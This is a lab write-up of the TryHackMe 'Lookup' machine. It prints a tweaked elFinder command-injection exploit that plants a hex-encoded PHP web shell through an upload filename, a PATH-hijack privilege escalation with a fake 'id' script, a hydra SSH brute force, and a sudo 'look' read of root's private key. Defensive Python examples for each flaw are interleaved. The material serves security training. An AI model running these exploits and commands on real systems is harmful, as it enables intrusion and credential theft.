Lookup
License
The following post by anthonyjsaab is licensed under CC BY 4.0
0 - Introduction
"Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through "Lookup," hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing."
Created by tryhackme, and josemlwdf
1 - Port Scans
1a - Discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:46 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 260.46 seconds
1b - Versioning and OS fingerprinting
┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:51 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.092s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Login Page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 103.29 ms 10.11.0.1
2 99.73 ms lookup.thm (10.10.25.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.85 seconds
1c - Vulners
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80 lookup.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 06:53 EET
Nmap scan report for lookup.thm (10.10.25.215)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.75 seconds
1z - What we know so far
No interesting CVEs
We have only 2 ports to investigate: 22 and 80
2 - Port 80
2a - Exploring



2b - Enumeration of lookup.thm
2bi - VHOST enum (dead-end)
┌──(kali㉿kali)-[~]
└─$ gobuster vhost -u http://lookup.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain true --proxy http://127.0.0.1:8080 -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://lookup.thm
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Proxy: http://127.0.0.1:8080
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================

2bii - Dirbusting (dead-end)
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://lookup.thm -w /usr/share/wordlists/dirb/big.txt -x php,txt,xml -t 40 --proxy http://127.0.0.1:8080
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://lookup.thm
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] Proxy: http://127.0.0.1:8080
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,xml
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 275]
/.htaccess.xml (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htpasswd.php (Status: 403) [Size: 275]
/.htaccess.php (Status: 403) [Size: 275]
/.htpasswd.xml (Status: 403) [Size: 275]
/.htpasswd.txt (Status: 403) [Size: 275]
/.htaccess.txt (Status: 403) [Size: 275]
/index.php (Status: 200) [Size: 719]
/login.php (Status: 200) [Size: 1]
/server-status (Status: 403) [Size: 275]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
2biii - Username enumeration
Even though the login form returns a generic response when we submit random credentials, the response still changes when the username is correct:


As seen above, two specific usernames return a different response from all the others. The message now states that the password is wrong, implying that 'admin' and 'jose' are valid usernames.
2biv - Password bruteforcing
Since admin is the more interesting username, we are going to bruteforce the password associated with admin:


A password X stands out: even though we got the initial error, this password in particular returned a different response than the other attempts.
Since the attempt failed with admin, we will try it with jose:

We now have valid credentials! However, attempting to log in to SSH with them fails, so we stick with HTTP for now. The successful HTTP login redirects us to another VHOST. It seems the absence of a valid cookie is why we did not detect the 'files.lookup.thm' VHOST earlier.
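Both findings above, an error message that differs for valid usernames and a password brute force that nothing throttles, come down to how the login handler is written. As an added example that is not part of the original post and not the lab's code, here is a Python login routine that returns one generic message whether or not the username exists, does the same hashing work on both paths (so timing gives nothing away either), and locks an account after repeated failures. The user store, salt and passwords are constructed for the example.

```python
import hashlib
import hmac
import time

GENERIC_ERROR = "Wrong username or password."   # one message for every failure
MAX_FAILURES = 5                                 # per-account failures before lockout
LOCKOUT_SECONDS = 300


def hash_password(password, salt, iterations=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


# Constructed demo user store (username -> (salt, hash)); not the lab's data.
_SALT = b"constructed-demo-salt"
USERS = {
    "jose":  (_SALT, hash_password("correct horse battery", _SALT)),
    "admin": (_SALT, hash_password("another demo secret", _SALT)),
}
# Compared against for unknown usernames so that path costs the same work.
_DUMMY = (_SALT, hash_password("dummy-never-matches", _SALT))


class LoginService:
    def __init__(self, users, clock=time.monotonic):
        self.users = users
        self.clock = clock
        self.failures = {}   # username -> (count, time of last failure)

    def _locked(self, username):
        count, last = self.failures.get(username, (0, 0.0))
        if count < MAX_FAILURES:
            return False
        if self.clock() - last >= LOCKOUT_SECONDS:
            self.failures.pop(username, None)   # lockout expired, start counting afresh
            return False
        return True

    def authenticate(self, username, password):
        """Return (ok, message); the message never reveals whether the username exists."""
        if self._locked(username):
            return False, GENERIC_ERROR          # same answer for real and made-up names
        salt, stored = self.users.get(username, _DUMMY)
        candidate = hash_password(password, salt)   # always computed, known user or not
        ok = hmac.compare_digest(candidate, stored) and username in self.users
        if ok:
            self.failures.pop(username, None)
            return True, "OK"
        count, _ = self.failures.get(username, (0, 0.0))
        self.failures[username] = (count + 1, self.clock())
        return False, GENERIC_ERROR


if __name__ == "__main__":
    svc = LoginService(USERS)
    print(svc.authenticate("jose", "guess"))      # (False, 'Wrong username or password.')
    print(svc.authenticate("nobody", "guess"))    # identical message for an unknown user
    print(svc.authenticate("jose", "correct horse battery"))
```

A per-account lockout on its own lets anyone lock a known account out by sending bad passwords, so in practice it is paired with per-source rate limiting; the point the example makes is that the two responses the writeup distinguished are now indistinguishable.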
2c - files.lookup.thm: Jackpot?
When logging in successfully to lookup.thm using the browser, we are redirected to this page:

All of these files contain credentials, but none of them work when bruteforcing SSH, so they are a dead end.
2d - Exploit & Foothold
Examining the source code, we find many references to elFinder. A comment even includes a link to its GitHub repo:
It turns out this web file manager is quite popular: around 7K commits and 5K stars. Maybe some exploit is out there?
┌──(kali㉿kali)-[~]
└─$ searchsploit elfinder
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
elFinder 2 - Remote Command Execution (via File Creation) | php/webapps/36925.py
elFinder 2.1.47 - 'PHP connector' Command Injection | php/webapps/46481.py
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit) | php/remote/46539.rb
elFinder Web file manager Version - 2.1.53 Remote Command Execution | php/webapps/51864.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We will try the 46481.py exploit, but it needs tweaking: every HTTP request the script sends must carry the Host header for files.lookup.thm and the session cookie obtained after logging in to lookup.thm. The changes are on lines 26, 27, 40, 46, 51 and 58.
┌──(kali㉿kali)-[~]
└─$ cat 46481.py
#!/usr/bin/python
'''
# Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability in the PHP connector.
# Date: 26/02/2019
# Exploit Author: @q3rv0
# Vulnerability reported by: Thomas Chauchefoin
# Google Dork: intitle:"elFinder 2.1.x"
# Vendor Homepage: https://studio-42.github.io/elFinder/
# Software Link: https://github.com/Studio-42/elFinder/archive/2.1.47.tar.gz
# Version: <= 2.1.47
# Tested on: Linux 64bit + Python2.7
# PoC: https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
# CVE: CVE-2019-9194
# Usage: python exploit.py [URL]
'''
import requests
import json
import sys

# Tweak for this target: every request must hit the files.lookup.thm VHOST
# and carry the session cookie obtained after logging in to lookup.thm
headers = {"Host" : "files.lookup.thm"}
cookies = {"REDACTED" : "REDACTED"}

payload = 'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php;echo SecSignal.jpg'

def usage():
    if len(sys.argv) != 2:
        print "Usage: python exploit.py [URL]"
        sys.exit(0)

def upload(url, payload):
    files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
    data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
    r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data, headers=headers, cookies=cookies)
    j = json.loads(r.text)
    return j['added'][0]['hash']

def imgRotate(url, hash):
    r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash), headers=headers, cookies=cookies)
    return r.text

def shell(url):
    r = requests.get("%s/php/SecSignal.php" % url, headers=headers, cookies=cookies)
    if r.status_code == 200:
        print "[+] Pwned! :)"
        print "[+] Getting the shell..."
        while 1:
            try:
                input = raw_input("$ ")
                r = requests.get("%s/php/SecSignal.php?c=%s" % (url, input), headers=headers, cookies=cookies)
                print r.text
            except KeyboardInterrupt:
                sys.exit("\nBye kaker!")
    else:
        print "[*] The site seems not to be vulnerable :("
--SNIP--
Running the tweaked exploit above gives us a foothold:
┌──(kali㉿kali)-[~]
└─$ cp ~/Pictures/Samples/sample1.JPG SecSignal.jpg
┌──(kali㉿kali)-[~]
└─$ python2 46481.py http://files.lookup.thm/elFinder
[*] Uploading the malicious image...
[*] Running the payload...
[+] Pwned! :)
[+] Getting the shell...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
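The whole exploit above hinges on one thing: the uploaded filename ends up inside a shell command line when the connector rotates the image, so a name containing ';' gets two extra commands executed. The secure-coding lesson is the usual one, validate the name on upload and never hand user data to a shell string. The following is an added Python illustration of that contrast, not elFinder's code nor the original post's; the exiftran flag mapping (-9/-1/-2 for 90/180/270 degrees) is taken from exiftran's manual as I recall it and is an assumption, and the injected name is constructed to have the same shape as the exploit's payload.

```python
import re
import subprocess
import sys

# Constructed: same shape as the exploit's filename (image name, then extra commands).
INJECTED_NAME = "SecSignal.jpg;echo injected > SecSignal.php;echo SecSignal.jpg"

# Assumed exiftran rotation flags (check against your build's manual).
ROTATE_FLAG = {90: "-9", 180: "-1", 270: "-2"}


def rotate_command_unsafe(filename, degree):
    """The flawed pattern: a user-controlled filename pasted into a shell string.
    A shell would treat ';' in the name as a command separator."""
    return "exiftran -i %s %s" % (ROTATE_FLAG[degree], filename)


# Allow-list: plain characters, must not start with '.' or '-', bounded length.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")
ALLOWED_EXT = (".jpg", ".jpeg")


def validate_upload_name(filename):
    """Applied at upload time, before the name is stored or used anywhere."""
    if not SAFE_NAME.match(filename):
        return False
    return filename.lower().endswith(ALLOWED_EXT)


def rotate_argv_safe(filename, degree):
    """Hardened form: validated name, fixed flag set, passed as argv (no shell)."""
    if not validate_upload_name(filename):
        raise ValueError("rejected filename: %r" % (filename,))
    if degree not in ROTATE_FLAG:
        raise ValueError("unsupported rotation: %r" % (degree,))
    return ["exiftran", "-i", ROTATE_FLAG[degree], filename]


def argv_preserves_name(filename):
    """Show that an argv list hands the name over as ONE argument: a child process
    (python itself, so this runs offline) echoes back exactly what it received,
    metacharacters included, and nothing after ';' is executed."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", filename],
        capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    print("unsafe command line :", rotate_command_unsafe(INJECTED_NAME, 180))
    print("child saw as argv[1]:", argv_preserves_name(INJECTED_NAME))
    print("validator accepts   :", validate_upload_name("SecSignal.jpg"))
    print("validator accepts   :", validate_upload_name(INJECTED_NAME))
```

Note that the argv form alone already defeats the injection; the allow-list is defence in depth, because a filename that survives into a later `system()`-style call elsewhere in the application would otherwise still be dangerous.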
3 - Horizontal PrivEsc
3a - LinPEAS
We run LinPEAS on the target machine. In the output of LinPEAS, we can find the following:
-rwsr-sr-x 1 root root 17K Jan 11 2024 /usr/sbin/pwm (Unknown SUID binary!)
pwm is owned by root and has the SUID and SGID bits set! Running the mentioned binary gives the following output:
www-data@lookup:/var$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
Exfiltrating this binary to my Kali for further analysis:
┌──(kali㉿kali)-[~]
└─$ ltrace ./pwm
puts("[!] Running 'id' command to extr"...[!] Running 'id' command to extract the username and user ID (UID)
) = 67
snprintf("id", 100, "id") = 2
popen("id", "r") = 0x55a711e836b0
__isoc99_fscanf(0x55a711e836b0, 0x55a6d9e33070, 0x7ffdaf89db60, 8) = 1
printf("[!] ID: %s\n", "kali" <no return ...>
--- SIGCHLD (Child exited) ---
[!] ID: kali
<... printf resumed> ) = 13
pclose(0x55a711e836b0) = 0
snprintf("/home/kali/.passwords", 100, "/home/%s/.passwords", "kali") = 21
fopen("/home/kali/.passwords", "r") = 0x55a711e838d0
fgetc(0x55a711e838d0) = 'h'
--SNIP--
From the above output, we can see that the pwm binary prints the contents of /home/%s/.passwords, where %s is taken from the output of the call to id. It happens that the user think does have this file, and we cannot read it as www-data:
www-data@lookup:/var$ ls -la /home/think/.passwords
ls -la /home/think/.passwords
-rw-r----- 1 root think 525 Jul 30 2023 /home/think/.passwords
We can also see from the ltrace output that the program invokes id without specifying an absolute path (lines 5 & 6 of the ltrace output). We can abuse this ambiguity.
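The root cause is worth isolating from the exploitation: a privileged program shells out to a bare command name and trusts the result, while PATH is inherited from whoever ran it. The following is an added Python illustration, not the lab's pwm binary nor code from the original post: it reimplements the flawed lookup (popen("id") with the caller's PATH) next to the fix (ask the kernel for the real uid and resolve it via the passwd database, no external command at all), then plants a fake id in a temporary directory exactly as the writeup does and compares what the two report. The fake id output is constructed to match the lab's think user.

```python
import os
import pwd
import re
import subprocess
import tempfile

# Constructed: what the planted 'id' prints, mirroring the writeup's fake script.
FAKE_ID_OUTPUT = "uid=1000(think) gid=1000(think) groups=1000(think)"
UID_RE = re.compile(r"uid=\d+\((?P<name>[^)]*)\)")


def current_user_unsafe(path):
    """The pwm pattern: popen("id") with whatever PATH the caller supplied.
    A SUID binary inherits PATH from its unprivileged caller, so the caller
    decides which 'id' actually runs."""
    out = subprocess.run("id", shell=True, env={"PATH": path},
                         capture_output=True, text=True, check=True).stdout
    m = UID_RE.search(out)
    return m.group("name") if m else None


def current_user_safe():
    """The fix: the real uid comes from the kernel and the name from the passwd
    database; no child process, so PATH is irrelevant."""
    uid = os.getuid()
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:            # uid without a passwd entry (common in containers)
        return str(uid)


def demo_path_hijack():
    """Plant a fake 'id' in a temp dir, prepend that dir to PATH (the writeup's
    PATH=.:$PATH) and return (what the unsafe lookup reports, what the safe one reports)."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "id")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho '%s'\n" % FAKE_ID_OUTPUT)
        os.chmod(fake, 0o755)
        hijacked = d + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        return current_user_unsafe(hijacked), current_user_safe()


if __name__ == "__main__":
    unsafe, safe = demo_path_hijack()
    print("popen('id') with attacker-controlled PATH reports:", unsafe)
    print("getuid()/getpwuid() reports:                       ", safe)
```

If a setuid program genuinely must run an external tool, the same rule that sudo applies through the secure_path seen later in this writeup applies to it: set PATH to a fixed trusted value (or use an absolute path) before the call, rather than trusting the caller's environment.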
3b - Abusing SUID - Going for think's passwords
We write an executable that gives the same output as id when run by think:
www-data@lookup:/var$ id think
id think
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ cat id
cat id
#!/bin/bash
echo 'uid=1000(think) gid=1000(think) groups=1000(think)'
www-data@lookup:/tmp$ chmod +x id
chmod +x id
www-data@lookup:/tmp$ ./id
./id
uid=1000(think) gid=1000(think) groups=1000(think)
www-data@lookup:/tmp$ which id
which id
/usr/bin/id
www-data@lookup:/tmp$ PATH=.:$PATH
PATH=.:$PATH
www-data@lookup:/tmp$ which id
which id
./id
All is set up correctly. Moment of truth!
www-data@lookup:/tmp$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171
3c - Bruteforcing SSH
In the previous part, we effectively got a wordlist. We will use it to try and log in to SSH using think as the username:
┌──(kali㉿kali)-[~]
└─$ hydra -vV -l think -P /home/kali/think_passwords.txt -t 4 -I ssh://lookup.thm
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-24 19:30:16
[DATA] max 4 tasks per 1 server, overall 4 tasks, 49 login tries (l:1/p:49), ~13 tries per task
[DATA] attacking ssh://lookup.thm:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://think@10.10.125.133:22
[INFO] Successful, password authentication is supported by ssh://10.10.125.133:22
[ATTEMPT] target lookup.thm - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose100190" - 5 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10001" - 6 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10.asd" - 7 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose10+" - 8 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0_07" - 9 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0990" - 10 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0986$" - 11 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose098130443" - 12 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0981" - 13 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0924" - 14 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0923" - 15 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose0921" - 16 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "thepassword" - 17 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose(1993)" - 18 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose'sbabygurl" - 19 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&vane" - 20 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&takie" - 21 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&samantha" - 22 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&pam" - 23 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jlo" - 24 of 49 [child 3] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessica" - 25 of 49 [child 0] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose&jessi" - 26 of 49 [child 1] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "josemario.AKA(think)" - 27 of 49 [child 2] (0/0)
[ATTEMPT] target lookup.thm - login "think" - pass "jose.medina." - 28 of 49 [child 3] (0/0)
[22][ssh] host: lookup.thm login: think password: REDACTED!!
[STATUS] attack finished for lookup.thm (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-24 19:30:42
We got the password!
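The hydra run above leaves a very recognisable trace on the server side: a burst of "Failed password" lines from one source address inside a few seconds, then an "Accepted password" from the same address. As an added example that is not part of the original post, here is a small Python detector for that pattern over constructed auth.log lines in the format OpenSSH writes; the host name, PIDs, ports, source addresses and the year 2024 assumed for the year-less syslog timestamps are all made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the syslog format OpenSSH writes to /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Nov 24 19:30:16 lookup sshd[2011]: Failed password for think from 10.11.0.5 port 51322 ssh2
Nov 24 19:30:17 lookup sshd[2013]: Failed password for think from 10.11.0.5 port 51324 ssh2
Nov 24 19:30:19 lookup sshd[2015]: Failed password for think from 10.11.0.5 port 51326 ssh2
Nov 24 19:30:20 lookup sshd[2017]: Failed password for think from 10.11.0.5 port 51328 ssh2
Nov 24 19:30:22 lookup sshd[2019]: Failed password for think from 10.11.0.5 port 51330 ssh2
Nov 24 19:30:24 lookup sshd[2021]: Failed password for think from 10.11.0.5 port 51332 ssh2
Nov 24 19:30:42 lookup sshd[2090]: Accepted password for think from 10.11.0.5 port 51400 ssh2
Nov 24 19:31:05 lookup sshd[2102]: Failed password for invalid user admin from 10.11.0.9 port 40000 ssh2
Nov 24 19:40:10 lookup sshd[2130]: Failed password for jose from 10.11.0.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip), or None for lines that are not
    password-auth events. Syslog timestamps carry no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("result"), m.group("user"), m.group("ip")


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Flag source IPs with >= threshold failed logins inside a sliding window,
    and record whether a successful login from that IP followed the burst."""
    recent = defaultdict(deque)   # ip -> (timestamp, user) failures still in the window
    alerts = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        window = recent[ip]
        if result == "Failed":
            window.append((ts, user))
            while window and (ts - window[0][0]).total_seconds() > window_s:
                window.popleft()
            if len(window) >= threshold:
                alert = alerts.setdefault(ip, {"peak_failures": 0, "users": set(),
                                               "success_after_burst": False})
                alert["peak_failures"] = max(alert["peak_failures"], len(window))
                alert["users"].update(u for _, u in window)
        elif ip in alerts:        # "Accepted" after a flagged burst: treat as a likely compromise
            alerts[ip]["success_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

Note the asymmetry the detector relies on: one source, many failures, then one success. Two failures nine minutes apart from 10.11.0.9 in the sample never cross the threshold, which is the intended behaviour for ordinary typos.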
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:31:32 PM UTC
System load: 0.0 Processes: 141
Usage of /: 59.7% of 9.75GB Users logged in: 0
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun May 12 12:07:25 2024 from 192.168.14.1
think@lookup:~$ cat user.txt
REDACTED!!
4 - Vertical PrivEsc
Right off the bat, the first try at manual enum got me this:
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
I also got lucky on how to use look:
think@lookup:~$ sudo look '' "/root/.ssh/id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
--SNIP--
-----END OPENSSH PRIVATE KEY-----
We save root's private key to a file named root on my Kali box, restrict its permissions, and log in to SSH with it:
┌──(kali㉿kali)-[~]
└─$ nano root
┌──(kali㉿kali)-[~]
└─$ chmod 600 root
┌──(kali㉿kali)-[~]
└─$ ssh -i root [email protected]
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun 24 Nov 2024 05:59:10 PM UTC
System load: 0.0 Processes: 147
Usage of /: 59.7% of 9.75GB Users logged in: 1
Memory usage: 25% IPv4 address for ens5: 10.10.125.133
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 13 10:00:24 2024 from 192.168.14.1
root@lookup:~# cat root.txt
REDACTED!!